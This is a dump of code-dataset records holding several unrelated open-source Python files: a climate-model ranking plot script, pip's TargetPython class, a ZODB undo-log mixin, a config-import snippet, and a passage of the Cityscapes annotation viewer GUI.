hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e72dedc6f276d06e4eeffe8f27a5436c09e1ef11 | 6,721 | py | Python | Dark_Scripts/plot_MS-Figure_3_v1_DARK.py | zmlabe/ModelBiasesANN | df28842a8594870db3282682b1261af5058af832 | [
"MIT"
] | 1 | 2022-02-12T11:56:54.000Z | 2022-02-12T11:56:54.000Z | Dark_Scripts/plot_MS-Figure_3_v1_DARK.py | zmlabe/ModelBiasesANN | df28842a8594870db3282682b1261af5058af832 | [
"MIT"
] | null | null | null | Dark_Scripts/plot_MS-Figure_3_v1_DARK.py | zmlabe/ModelBiasesANN | df28842a8594870db3282682b1261af5058af832 | [
"MIT"
] | null | null | null | """
Script to plot figure 3
Author : Zachary M. Labe
Date : 7 July 2021
Version : 1
"""
### Import packages
import sys
import matplotlib.pyplot as plt
import matplotlib.colors as c
import numpy as np
import palettable.cubehelix as cm
import palettable.scientific.sequential as sss
import palettable.cartocolors.qualitative as cc
import cmocean as cmocean
import cmasher as cmr
import calc_Utilities as UT
import scipy.stats as sts
### Plotting defaults
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
plt.rc('savefig',facecolor='black')
plt.rc('axes',edgecolor='darkgrey')
plt.rc('xtick',color='darkgrey')
plt.rc('ytick',color='darkgrey')
plt.rc('axes',labelcolor='darkgrey')
plt.rc('axes',facecolor='black')
### Set parameters
directorydata = '/Users/zlabe/Documents/Research/ModelComparison/Data/MSFigures_v1/'
directoryfigure = '/Users/zlabe/Documents/Projects/ModelBiasesANN/Dark_Figures/'
variablesall = ['T2M']
allDataLabels = ['CanESM2','MPI','CSIRO-MK3.6','EC-EARTH','GFDL-CM3','GFDL-ESM2M','LENS','MM-Mean']
letters = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p"]
THRESH = 0.05
### Read in data
globe = np.load(directorydata + 'Ranks_thresh-%s_%s.npy' % (THRESH,'SMILEGlobe'))
arctic = np.load(directorydata + 'Ranks_thresh-%s_%s.npy' % (THRESH,'LowerArctic'))
###############################################################################
###############################################################################
###############################################################################
###############################################################################
### Plot first meshgrid
fig = plt.figure()
ax = plt.subplot(211)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.get_xaxis().set_tick_params(direction='out', width=2,length=3,
color='darkgrey')
ax.get_yaxis().set_tick_params(direction='out', width=2,length=3,
color='darkgrey')
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='on', # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom='off')
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
left='on', # ticks along the bottom edge are off
right=False, # ticks along the top edge are off
labelleft='on')
csm=cm.cubehelix2_16_r.mpl_colormap
norm = c.BoundaryNorm(np.arange(1,9+1,1),csm.N)
cs = plt.pcolormesh(globe,shading='faceted',edgecolor='darkgrey',
linewidth=0.05,vmin=1,vmax=8,norm=norm,cmap=csm,clip_on=False)
plt.yticks(np.arange(0.5,8.5,1),allDataLabels,ha='right',va='center',color='w',size=6)
yax = ax.get_yaxis()
yax.set_tick_params(pad=2)
plt.xticks([])
plt.xlim([0,70])
for i in range(globe.shape[0]):
for j in range(globe.shape[1]):
cc = 'k'
plt.text(j+0.5,i+0.5,r'\textbf{%s}' % int(globe[i,j]),fontsize=4,
color=cc,va='center',ha='center')
###############################################################################
###############################################################################
###############################################################################
ax = plt.subplot(212)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.get_xaxis().set_tick_params(direction='out', width=2,length=3,
color='darkgrey')
ax.get_yaxis().set_tick_params(direction='out', width=2,length=3,
color='darkgrey')
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='on', # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom='on')
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
left='on', # ticks along the bottom edge are off
right=False, # ticks along the top edge are off
labelleft='on')
csm=cm.cubehelix2_16_r.mpl_colormap
norm = c.BoundaryNorm(np.arange(1,9+1,1),csm.N)
cs = plt.pcolormesh(arctic,shading='faceted',edgecolor='darkgrey',
linewidth=0.05,vmin=1,vmax=8,norm=norm,cmap=csm,clip_on=False)
plt.yticks(np.arange(0.5,8.5,1),allDataLabels,ha='right',va='center',color='w',size=6)
yax = ax.get_yaxis()
yax.set_tick_params(pad=2)
plt.xticks(np.arange(0.5,70.5,5),map(str,np.arange(1950,2022,5)),
color='darkgrey',size=6)
plt.xlim([0,70])
for i in range(arctic.shape[0]):
for j in range(arctic.shape[1]):
cc = 'k'
plt.text(j+0.5,i+0.5,r'\textbf{%s}' % int(arctic[i,j]),fontsize=4,
color=cc,va='center',ha='center')
plt.annotate(r'\textbf{GLOBAL}',
textcoords='axes fraction',
xy=(0,0), xytext=(1.02,1.26),
fontsize=18,color='darkgrey',alpha=1,rotation=270,va='bottom')
plt.annotate(r'\textbf{ARCTIC}',
textcoords='axes fraction',
xy=(0,0), xytext=(1.02,0.17),
fontsize=18,color='darkgrey',alpha=1,rotation=270,va='bottom')
###############################################################################
cbar_ax1 = fig.add_axes([0.35,0.11,0.3,0.03])
cbar = fig.colorbar(cs,cax=cbar_ax1,orientation='horizontal',
extend='neither',extendfrac=0.07,drawedges=True)
cbar.set_ticks([])
cbar.set_ticklabels([])
cbar.ax.invert_xaxis()
cbar.ax.tick_params(axis='x', size=.001,labelsize=7)
cbar.dividers.set_color('darkgrey')
cbar.dividers.set_linewidth(1)
cbar.outline.set_edgecolor('darkgrey')
cbar.outline.set_linewidth(1)
cbar.set_label(r'\textbf{RELATIVE MODEL CHOICE}',color='w',labelpad=7,fontsize=18)
cbar.ax.get_yaxis().set_ticks([])
for j, lab in enumerate(range(1,9,1)):
cbar.ax.text((2 * j+2.9)/2, 4.5, lab,ha='center',va='center',
size=5,color='darkgrey')
# plt.annotate(r'\textbf{aaaaaaa}',
# textcoords='figure fraction',
# xy=(0,0), xytext=(0.38,0.13),ha='center',va='center',
# fontsize=5,color='crimson',alpha=1,rotation=0,zorder=100)
plt.tight_layout()
plt.subplots_adjust(bottom=0.2,hspace=0.1)
plt.savefig(directoryfigure + 'MS-Figure_3_v1_DARK.png',dpi=1000)
| 38.626437 | 101 | 0.583544 |
a23b79c4e4e9bd0c126dc8162f163cbbe04ca528 | 3,820 | py | Python | virtual/lib/python3.6/site-packages/pip/_internal/models/target_python.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 120 | 2019-11-12T19:22:44.000Z | 2020-05-17T12:17:25.000Z | virtual/lib/python3.6/site-packages/pip/_internal/models/target_python.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 123 | 2019-09-10T14:48:01.000Z | 2019-11-28T21:24:06.000Z | virtual/lib/python3.6/site-packages/pip/_internal/models/target_python.py | Krasivaya/Tracks | c18d1c9222dff39e4678d44495a8a7d9434339ff | [
"MIT"
] | 98 | 2019-10-17T14:48:28.000Z | 2022-01-21T03:33:38.000Z | import sys
from pip._internal.pep425tags import get_supported, version_info_to_nodot
from pip._internal.utils.misc import normalize_version_info
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import List, Optional, Tuple
from pip._internal.pep425tags import Pep425Tag
class TargetPython(object):
"""
Encapsulates the properties of a Python interpreter one is targeting
for a package install, download, etc.
"""
def __init__(
self,
platform=None, # type: Optional[str]
py_version_info=None, # type: Optional[Tuple[int, ...]]
abi=None, # type: Optional[str]
implementation=None, # type: Optional[str]
):
# type: (...) -> None
"""
:param platform: A string or None. If None, searches for packages
that are supported by the current system. Otherwise, will find
packages that can be built on the platform passed in. These
packages will only be downloaded for distribution: they will
not be built locally.
:param py_version_info: An optional tuple of ints representing the
Python version information to use (e.g. `sys.version_info[:3]`).
This can have length 1, 2, or 3 when provided.
:param abi: A string or None. This is passed to pep425tags.py's
get_supported() function as is.
:param implementation: A string or None. This is passed to
pep425tags.py's get_supported() function as is.
"""
# Store the given py_version_info for when we call get_supported().
self._given_py_version_info = py_version_info
if py_version_info is None:
py_version_info = sys.version_info[:3]
else:
py_version_info = normalize_version_info(py_version_info)
py_version = '.'.join(map(str, py_version_info[:2]))
self.abi = abi
self.implementation = implementation
self.platform = platform
self.py_version = py_version
self.py_version_info = py_version_info
# This is used to cache the return value of get_tags().
self._valid_tags = None # type: Optional[List[Pep425Tag]]
def format_given(self):
# type: () -> str
"""
Format the given, non-None attributes for display.
"""
display_version = None
if self._given_py_version_info is not None:
display_version = '.'.join(
str(part) for part in self._given_py_version_info
)
key_values = [
('platform', self.platform),
('version_info', display_version),
('abi', self.abi),
('implementation', self.implementation),
]
return ' '.join(
'{}={!r}'.format(key, value) for key, value in key_values
if value is not None
)
def get_tags(self):
# type: () -> List[Pep425Tag]
"""
Return the supported PEP 425 tags to check wheel candidates against.
The tags are returned in order of preference (most preferred first).
"""
if self._valid_tags is None:
# Pass versions=None if no py_version_info was given since
# versions=None uses special default logic.
py_version_info = self._given_py_version_info
if py_version_info is None:
versions = None
else:
versions = [version_info_to_nodot(py_version_info)]
tags = get_supported(
versions=versions,
platform=self.platform,
abi=self.abi,
impl=self.implementation,
)
self._valid_tags = tags
return self._valid_tags
| 35.700935 | 76 | 0.610471 |
a74641bea6ae48f17f8a757c31b6bf0a10a4306b | 1,540 | py | Python | eggs/ZODB-4.1.0-py2.7.egg/ZODB/UndoLogCompatible.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | eggs/ZODB-4.1.0-py2.7.egg/ZODB/UndoLogCompatible.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | eggs/ZODB-4.1.0-py2.7.egg/ZODB/UndoLogCompatible.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Provide backward compatibility with storages that only have undoLog()."""
class UndoLogCompatible:
def undoInfo(self, first=0, last=-20, specification=None):
if specification:
# filter(desc) returns true iff `desc` is a "superdict"
# of `specification`, meaning that `desc` contains the same
# (key, value) pairs as `specification`, and possibly additional
# (key, value) pairs. Another way to do this might be
# d = desc.copy()
# d.update(specification)
# return d == desc
def filter(desc, spec=specification.items()):
get = desc.get
for k, v in spec:
if get(k, None) != v:
return 0
return 1
else:
filter = None
return self.undoLog(first, last, filter)
| 40.526316 | 78 | 0.551948 |
15bf5bf91fd0716fadb62386a93f248e0e406e1c | 200 | py | Python | Editor/updator/config.py | RangHo/pini-engine | e1407724de32a433b7b46e0ee2469240b70d960b | [
"MIT"
] | null | null | null | Editor/updator/config.py | RangHo/pini-engine | e1407724de32a433b7b46e0ee2469240b70d960b | [
"MIT"
] | null | null | null | Editor/updator/config.py | RangHo/pini-engine | e1407724de32a433b7b46e0ee2469240b70d960b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
config = None
try:
from conf import config_dev as config
except ImportError:
try:
from conf import config_live as config
except:
print "con not find config py"
pass
| 15.384615 | 40 | 0.705 |
8e34a6237cdfc1e34c5f128942ce88e5ff7584e2 | 45,506 | py | Python | data_scripts/cityscapes/cityscapesscripts/viewer/cityscapesViewer.py | lupvasile/video-seg | d0b1f5ec75c49ee42ba08939451575580ce6f798 | [
"MIT"
] | null | null | null | data_scripts/cityscapes/cityscapesscripts/viewer/cityscapesViewer.py | lupvasile/video-seg | d0b1f5ec75c49ee42ba08939451575580ce6f798 | [
"MIT"
] | null | null | null | data_scripts/cityscapes/cityscapesscripts/viewer/cityscapesViewer.py | lupvasile/video-seg | d0b1f5ec75c49ee42ba08939451575580ce6f798 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
#################
## Import modules
#################
from __future__ import print_function, absolute_import, division
# get command line parameters
import sys
# walk directories
import glob
# access to OS functionality
import os
# call processes
import subprocess
# copy things
import copy
# numpy
import numpy as np
# matplotlib for colormaps
import matplotlib.colors
import matplotlib.cm
from PIL import Image
# the label tool was originally written for python 2 and pyqt4
# in order to enable compatibility with python 3, we need
# to fix the pyqt api to the old version that is default in py2
import sip
apis = ['QDate', 'QDateTime', 'QString', 'QTextStream', 'QTime', 'QUrl', 'QVariant']
for a in apis:
#sip.setapi(a, 1) #does not work on windows
pass
# import pyqt for everything graphical
from PyQt5 import QtGui, QtCore, QtWidgets
#################
## Helper classes
#################
# annotation helper
from cityscapesscripts.helpers.annotation import Annotation, CsObjectType
from cityscapesscripts.helpers.labels import name2label, assureSingleInstanceName
from cityscapesscripts.helpers.labels_cityPersons import name2labelCp
#################
## Main GUI class
#################
# The main class which is a QtGui -> Main Window
class CityscapesViewer(QtWidgets.QMainWindow):
#############################
## Construction / Destruction
#############################
# Constructor
def __init__(self):
# Construct base class
super(CityscapesViewer, self).__init__()
# This is the configuration.
# The filename of the image we currently working on
self.currentFile = ""
# The filename of the labels we currently working on
self.currentLabelFile = ""
# The path of the images of the currently loaded city
self.city = ""
# The name of the currently loaded city
self.cityName = ""
# Ground truth type
self.gtType = CsObjectType.POLY
# The path of the labels. In this folder we expect a folder for each city
# Within these city folders we expect the label with a filename matching
# the images, except for the extension
self.labelPath = ""
# The transparency of the labels over the image
self.transp = 0.5
# The zoom toggle
self.zoom = False
# The zoom factor
self.zoomFactor = 1.5
# The size of the zoom window. Currently there is no setter or getter for that
self.zoomSize = 400 #px
# The width that we actually use to show the image
self.w = 0
# The height that we actually use to show the image
self.h = 0
# The horizontal offset where we start drawing within the widget
self.xoff = 0
# The vertical offset where we start drawing withing the widget
self.yoff = 0
# A gap that we leave around the image as little border
self.bordergap = 20
# The scale that was used, ie
# self.w = self.scale * self.image.width()
# self.h = self.scale * self.image.height()
self.scale = 1.0
# Filenames of all images in current city
self.images = []
# Image extension
self.imageExt = "_leftImg8bit.png"
# Ground truth extension
self.gtExt = "_gt*.json"
# Current image as QImage
self.image = QtGui.QImage()
# Index of the current image within the city folder
self.idx = 0
# All annotated objects in current image, i.e. list of csPoly or csBbox
self.annotation = []
# The current object the mouse points to. It's index in self.labels
self.mouseObj = -1
# The object that is highlighted and its label. An object instance
self.highlightObj = None
self.highlightObjLabel = None
# The position of the mouse
self.mousePosOrig = None
# The position of the mouse scaled to label coordinates
self.mousePosScaled = None
# If the mouse is outside of the image
self.mouseOutsideImage = True
# The position of the mouse upon enabling the zoom window
self.mousePosOnZoom = None
# A list of toolbar actions that need an image
self.actImage = []
# A list of toolbar actions that need an image that is not the first
self.actImageNotFirst = []
# A list of toolbar actions that need an image that is not the last
self.actImageNotLast = []
# Toggle status of the play icon
self.playState = False
# Enable disparity visu in general
self.enableDisparity = True
# Show disparities instead of labels
self.showDisparity = False
# The filename of the disparity map we currently working on
self.currentDispFile = ""
# The disparity image
self.dispImg = None
# As overlay
self.dispOverlay = None
# The disparity search path
self.dispPath = None
# Disparity extension
self.dispExt = "_disparity.png"
# Generate colormap
try:
norm = matplotlib.colors.Normalize(vmin=3,vmax=100)
cmap = matplotlib.cm.plasma
self.colormap = matplotlib.cm.ScalarMappable( norm=norm , cmap=cmap )
except:
self.enableDisparity = False
# Default label
self.defaultLabel = 'static'
if self.defaultLabel not in name2label:
print('The {0} label is missing in the internal label definitions.'.format(self.defaultLabel))
return
# Last selected label
self.lastLabel = self.defaultLabel
# Setup the GUI
self.initUI()
# If we already know a city from the saved config -> load it
self.loadCity()
self.imageChanged()
# Destructor
def __del__(self):
return
# Construct everything GUI related. Called by constructor
def initUI(self):
# Create a toolbar
self.toolbar = self.addToolBar('Tools')
# Add the tool buttons
iconDir = os.path.join( os.path.dirname(__file__) , 'icons' )
# Loading a new city
loadAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'open.png' )), '&Tools', self)
loadAction.setShortcuts(['o'])
self.setTip( loadAction, 'Open city' )
loadAction.triggered.connect( self.getCityFromUser )
self.toolbar.addAction(loadAction)
# Open previous image
backAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'back.png')), '&Tools', self)
backAction.setShortcut('left')
backAction.setStatusTip('Previous image')
backAction.triggered.connect( self.prevImage )
self.toolbar.addAction(backAction)
self.actImageNotFirst.append(backAction)
# Open next image
nextAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'next.png')), '&Tools', self)
nextAction.setShortcut('right')
self.setTip( nextAction, 'Next image' )
nextAction.triggered.connect( self.nextImage )
self.toolbar.addAction(nextAction)
self.actImageNotLast.append(nextAction)
# Play
playAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'play.png')), '&Tools', self)
playAction.setShortcut(' ')
playAction.setCheckable(True)
playAction.setChecked(False)
self.setTip( playAction, 'Play all images' )
playAction.triggered.connect( self.playImages )
self.toolbar.addAction(playAction)
self.actImageNotLast.append(playAction)
self.playAction = playAction
# Select image
selImageAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'shuffle.png' )), '&Tools', self)
selImageAction.setShortcut('i')
self.setTip( selImageAction, 'Select image' )
selImageAction.triggered.connect( self.selectImage )
self.toolbar.addAction(selImageAction)
self.actImage.append(selImageAction)
# Enable/disable disparity visu. Toggle button
if self.enableDisparity:
dispAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'disp.png' )), '&Tools', self)
dispAction.setShortcuts(['d'])
dispAction.setCheckable(True)
dispAction.setChecked(self.showDisparity)
self.setTip( dispAction, 'Enable/disable depth visualization' )
dispAction.toggled.connect( self.dispToggle )
self.toolbar.addAction(dispAction)
self.actImage.append(dispAction)
# Enable/disable zoom. Toggle button
zoomAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'zoom.png' )), '&Tools', self)
zoomAction.setShortcuts(['z'])
zoomAction.setCheckable(True)
zoomAction.setChecked(self.zoom)
self.setTip( zoomAction, 'Enable/disable permanent zoom' )
zoomAction.toggled.connect( self.zoomToggle )
self.toolbar.addAction(zoomAction)
self.actImage.append(zoomAction)
# Decrease transparency
minusAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'minus.png' )), '&Tools', self)
minusAction.setShortcut('-')
self.setTip( minusAction, 'Decrease transparency' )
minusAction.triggered.connect( self.minus )
self.toolbar.addAction(minusAction)
# Increase transparency
plusAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'plus.png' )), '&Tools', self)
plusAction.setShortcut('+')
self.setTip( plusAction, 'Increase transparency' )
plusAction.triggered.connect( self.plus )
self.toolbar.addAction(plusAction)
# Display path to current image in message bar
displayFilepathAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'filepath.png' )), '&Tools', self)
displayFilepathAction.setShortcut('f')
self.setTip( displayFilepathAction, 'Show path to current image' )
displayFilepathAction.triggered.connect( self.displayFilepath )
self.toolbar.addAction(displayFilepathAction)
# Display help message
helpAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'help19.png' )), '&Tools', self)
helpAction.setShortcut('h')
self.setTip( helpAction, 'Help' )
helpAction.triggered.connect( self.displayHelpMessage )
self.toolbar.addAction(helpAction)
# Close the application
exitAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'exit.png' )), '&Tools', self)
exitAction.setShortcuts(['Esc'])
self.setTip( exitAction, 'Exit' )
exitAction.triggered.connect( self.close )
self.toolbar.addAction(exitAction)
# The default text for the status bar
self.defaultStatusbar = 'Ready'
# Create a statusbar. Init with default
self.statusBar().showMessage( self.defaultStatusbar )
# Enable mouse move events
self.setMouseTracking(True)
self.toolbar.setMouseTracking(True)
# Open in full screen
self.showFullScreen( )
# Set a title
self.applicationTitle = 'Cityscapes Viewer v1.0'
self.setWindowTitle(self.applicationTitle)
#self.displayHelpMessage()
self.getCityFromUser()
# And show the application
self.show()
#############################
## Toolbar call-backs
#############################
# Switch to previous image in file list
# Load the image
# Load its labels
# Update the mouse selection
# View
def prevImage(self):
if not self.images:
return
if self.idx > 0:
self.idx -= 1
self.imageChanged()
else:
message = "Already at the first image"
self.statusBar().showMessage(message)
return
# Switch to next image in file list
# Load the image
# Load its labels
# Update the mouse selection
# View
def nextImage(self):
if not self.images:
return
if self.idx < len(self.images)-1:
self.idx += 1
self.imageChanged()
elif self.playState:
self.playState = False
self.playAction.setChecked(False)
else:
message = "Already at the last image"
self.statusBar().showMessage(message)
if self.playState:
QtCore.QTimer.singleShot(0, self.nextImage)
return
# Play images, i.e. auto-switch to next image
def playImages(self, status):
self.playState = status
if self.playState:
QtCore.QTimer.singleShot(0, self.nextImage)
# Switch to a selected image of the file list
# Ask the user for an image
# Load the image
# Load its labels
# Update the mouse selection
# View
def selectImage(self):
if not self.images:
return
dlgTitle = "Select image to load"
self.statusBar().showMessage(dlgTitle)
items = [ os.path.basename(i) for i in self.images ]
(item, ok) = QtWidgets.QInputDialog.getItem(self, dlgTitle, "Image", items, self.idx, False)
if (ok and item):
idx = items.index(item)
if idx != self.idx:
self.idx = idx
self.imageChanged()
else:
# Restore the message
self.statusBar().showMessage( self.defaultStatusbar )
# Toggle zoom
def zoomToggle(self, status):
self.zoom = status
if status :
self.mousePosOnZoom = self.mousePosOrig
self.update()
# Toggle disparity visu
def dispToggle(self, status):
self.showDisparity = status
self.imageChanged()
# Increase label transparency
def minus(self):
self.transp = max(self.transp-0.1,0.0)
self.update()
def displayFilepath(self):
self.statusBar().showMessage("Current image: {0}".format( self.currentFile ))
self.update()
def displayHelpMessage(self):
message = self.applicationTitle + "\n\n"
message += "INSTRUCTIONS\n"
message += " - select a city from drop-down menu\n"
message += " - browse images and labels using\n"
message += " the toolbar buttons or the controls below\n"
message += "\n"
message += "CONTROLS\n"
message += " - select city [o]\n"
message += " - highlight objects [move mouse]\n"
message += " - next image [left arrow]\n"
message += " - previous image [right arrow]\n"
message += " - toggle autoplay [space]\n"
message += " - increase/decrease label transparency\n"
message += " [ctrl+mousewheel] or [+ / -]\n"
if self.enableDisparity:
message += " - show disparity/depth overlay (if available) [d]\n"
message += " - open zoom window [z]\n"
message += " zoom in/out [mousewheel]\n"
message += " enlarge/shrink zoom window [shift+mousewheel]\n"
message += " - select a specific image [i]\n"
message += " - show path to image below [f]\n"
message += " - exit viewer [esc]\n"
QtWidgets.QMessageBox.about(self, "HELP!", message)
self.update()
# Decrease label transparency
def plus(self):
self.transp = min(self.transp+0.1,1.0)
self.update()
# Close the application
def closeEvent(self,event):
event.accept()
#############################
## Custom events
#############################
def imageChanged(self):
# Load the first image
self.loadImage()
# Load its labels if available
self.loadLabels()
# Load disparities if available
self.loadDisparities()
# Update the object the mouse points to
self.updateMouseObject()
# Update the GUI
self.update()
#############################
## File I/O
#############################
# Load the currently selected city if possible
def loadCity(self):
# clear annotations
self.annotation = []
# Search for all *.pngs to get the image list
self.images = []
if os.path.isdir(self.city):
self.images = glob.glob( os.path.join( self.city , '*' + self.imageExt ) )
self.images.sort()
if self.currentFile in self.images:
self.idx = self.images.index(self.currentFile)
else:
self.idx = 0
# Load the currently selected image
# Does only load if not previously loaded
# Does not refresh the GUI
def loadImage(self):
success = False
message = self.defaultStatusbar
if self.images:
filename = self.images[self.idx]
filename = os.path.normpath( filename )
if not self.image.isNull() and filename == self.currentFile:
success = True
else:
self.image = QtGui.QImage(filename)
if self.image.isNull():
message = "Failed to read image: {0}".format( filename )
else:
message = "Read image: {0}".format( filename )
self.currentFile = filename
success = True
# Update toolbar actions that need an image
for act in self.actImage:
act.setEnabled(success)
for act in self.actImageNotFirst:
act.setEnabled(success and self.idx > 0)
for act in self.actImageNotLast:
act.setEnabled(success and self.idx < len(self.images)-1)
self.statusBar().showMessage(message)
# Load the labels from file
# Only loads if they exist
# Otherwise the filename is stored and that's it
def loadLabels(self):
filename = self.getLabelFilename()
if not filename:
self.clearAnnotation()
return
# If we have everything and the filename did not change, then we are good
if self.annotation and filename == self.currentLabelFile:
return
# Clear the current labels first
self.clearAnnotation()
try:
self.annotation = Annotation(self.gtType)
self.annotation.fromJsonFile(filename)
except IOError as e:
# This is the error if the file does not exist
message = "Error parsing labels in {0}. Message: {1}".format( filename, e.strerror )
self.statusBar().showMessage(message)
# Remember the filename loaded
self.currentLabelFile = filename
# Remeber the status bar message to restore it later
restoreMessage = self.statusBar().currentMessage()
# Restore the message
self.statusBar().showMessage( restoreMessage )
# Load the disparity map from file
# Only loads if they exist
def loadDisparities(self):
if not self.enableDisparity:
return
if not self.showDisparity:
return
filename = self.getDisparityFilename()
if not filename:
self.dispImg = None
return
# If we have everything and the filename did not change, then we are good
if self.dispImg and filename == self.currentDispFile:
return
# Clear the current labels first
self.dispImg = None
try:
self.dispImg = Image.open(filename)
except IOError as e:
# This is the error if the file does not exist
message = "Error parsing disparities in {0}. Message: {1}".format( filename, e.strerror )
self.statusBar().showMessage(message)
self.dispImg = None
if self.dispImg:
dispNp = np.array( self.dispImg )
dispNp = dispNp / 128.
dispNp.round()
dispNp = np.array( dispNp , dtype=np.uint8 )
dispQt = QtGui.QImage( dispNp.data , dispNp.shape[1] , dispNp.shape[0] , QtGui.QImage.Format_Indexed8 )
colortable = []
for i in range(256):
color = self.colormap.to_rgba(i)
colorRgb = ( int(color[0]*255) , int(color[1]*255) , int(color[2]*255) )
colortable.append( QtGui.qRgb( *colorRgb ) )
dispQt.setColorTable( colortable )
dispQt = dispQt.convertToFormat( QtGui.QImage.Format_ARGB32_Premultiplied )
self.dispOverlay = dispQt
# Remember the filename loaded
self.currentDispFile = filename
# Remember the status bar message to restore it later
restoreMessage = self.statusBar().currentMessage()
# Restore the message
self.statusBar().showMessage( restoreMessage )
#############################
## Drawing
#############################
# This method is called when redrawing everything
# Can be manually triggered by self.update()
# Note that there must not be any other self.update within this method
# or any methods that are called within
def paintEvent(self, event):
# Create a QPainter that can perform draw actions within a widget or image
qp = QtGui.QPainter()
# Begin drawing in the application widget
qp.begin(self)
# Update scale
self.updateScale(qp)
# Determine the object ID to highlight
self.getHighlightedObject(qp)
# Draw the image first
self.drawImage(qp)
if self.enableDisparity and self.showDisparity:
# Draw the disparities on top
overlay = self.drawDisp(qp)
else:
# Draw the labels on top
if self.gtType == CsObjectType.POLY:
overlay = self.drawLabels(qp)
elif self.gtType == CsObjectType.BBOX:
overlay = self.drawBboxes(qp)
# Draw the label name next to the mouse
self.drawLabelAtMouse(qp)
# Draw the zoom
self.drawZoom(qp, overlay)
# Thats all drawing
qp.end()
# Forward the paint event
QtWidgets.QMainWindow.paintEvent(self,event)
# Update the scaling
def updateScale(self, qp):
if not self.image.width() or not self.image.height():
return
# Horizontal offset
self.xoff = self.bordergap
# Vertical offset
self.yoff = self.toolbar.height()+self.bordergap
# We want to make sure to keep the image aspect ratio and to make it fit within the widget
# Without keeping the aspect ratio, each side of the image is scaled (multiplied) with
sx = float(qp.device().width() - 2*self.xoff) / self.image.width()
sy = float(qp.device().height() - 2*self.yoff) / self.image.height()
# To keep the aspect ratio while making sure it fits, we use the minimum of both scales
# Remember the scale for later
self.scale = min( sx , sy )
# These are then the actual dimensions used
self.w = self.scale * self.image.width()
self.h = self.scale * self.image.height()
# Determine the highlighted object for drawing
def getHighlightedObject(self, qp):
# This variable we want to fill
self.highlightObj = None
# Without labels we cannot do so
if not self.annotation:
return
# If available its the selected object
highlightObjId = -1
# If not available but the polygon is empty or closed, its the mouse object
if highlightObjId < 0 and not self.mouseOutsideImage:
highlightObjId = self.mouseObj
# Get the actual object that is highlighted
if highlightObjId >= 0:
self.highlightObj = self.annotation.objects[highlightObjId]
self.highlightObjLabel = self.annotation.objects[highlightObjId].label
